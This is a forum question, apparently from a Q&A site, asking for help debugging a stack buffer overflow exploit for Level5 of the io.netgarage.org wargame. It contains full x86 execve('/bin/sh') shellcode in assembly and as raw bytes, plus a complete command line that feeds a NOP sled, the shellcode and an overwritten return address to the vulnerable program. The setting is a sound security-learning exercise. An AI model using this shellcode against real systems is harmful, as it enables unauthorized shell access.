I am currently trying to complete Level5 of the io.netgarage.org wargame. To complete it I wrote the following asm payload:
global _start
section .text
_start:
xor eax, eax        ; eax = 0 (also used as the NULL terminator below)
push eax            ; NULL terminator for the string
push 0x68732f6e     ; "n/sh"
push 0x69622f2f     ; "//bi"  -> stack now holds "//bin/sh\0"
mov ebx, esp        ; ebx = pointer to "//bin/sh" (filename)
push eax            ; NULL end of argv array
mov edx, esp        ; edx = envp (NULL)
push ebx            ; argv[0] = pointer to "//bin/sh"
mov ecx, esp        ; ecx = argv
mov al, 11          ; syscall number for sys_execve
int 0x80            ; invoke the syscall
which should spawn a shell by calling sys_execve, and it does. But only as long as I don't use it as the actual payload.
As soon as I try to feed it to the vulnerable C program, I get segfaulted. By inspecting it with gdb, I was able to pin the segfault to the line
mov edx, esp
Everything that should happen before (overwriting the return address, NOP sled) actually works as intended.
Additional Information:
- I get the opcodes by compiling the above asm code with
nasm -f elf32 file.asm -o file.o
objdump -d file.o
- I call the vulnerable program like this:
/levels/level05 $(python -c 'print "\x90"*115 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\xa0\xfb\xff\xbf"')
- The return address 0xbffffba0 I got by inspecting the values of the stack with gdb
- My current assumption is that it has something to do with the stack, because a script I found online, utilizing a jmp-call-pop pattern, worked seemingly correctly
Thank you,
tarkes